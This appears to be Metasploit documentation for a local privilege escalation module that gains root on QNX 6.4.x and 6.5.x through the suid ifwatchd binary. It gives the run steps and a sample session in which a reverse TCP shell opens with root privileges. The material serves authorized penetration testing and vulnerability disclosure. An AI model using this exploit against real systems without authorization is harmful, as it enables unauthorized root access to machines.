## Description

  This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
  systems by exploiting the `ifwatchd` suid executable.


## Vulnerable Application

  `ifwatchd` allows users to specify scripts to execute using the `-A`
  command line argument; however, it does not drop privileges when
  executing user-supplied scripts, resulting in execution of arbitrary
  commands as root.

  This module has been tested successfully on:

  * QNX Neutrino 6.5.0 (x86)
  * QNX Neutrino 6.5.0 SP1 (x86)

  QNX Neutrino 6.5.0 Service Pack 1 is available here:

  * http://www.qnx.com/download/feature.html?programid=23665


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/qnx/local/ifwatchd_priv_esc`
  3. `set session <ID>`
  4. `run`
  5. You should get a *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

  ```
  msf5 > use exploit/qnx/local/ifwatchd_priv_esc
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 
  session => 1
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing interface arrival event script...
  [*] Executing /sbin/ifwatchd...
  [*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400

  id
  uid=100(test) gid=100 euid=0(root)
  uname -a
  QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
  ```

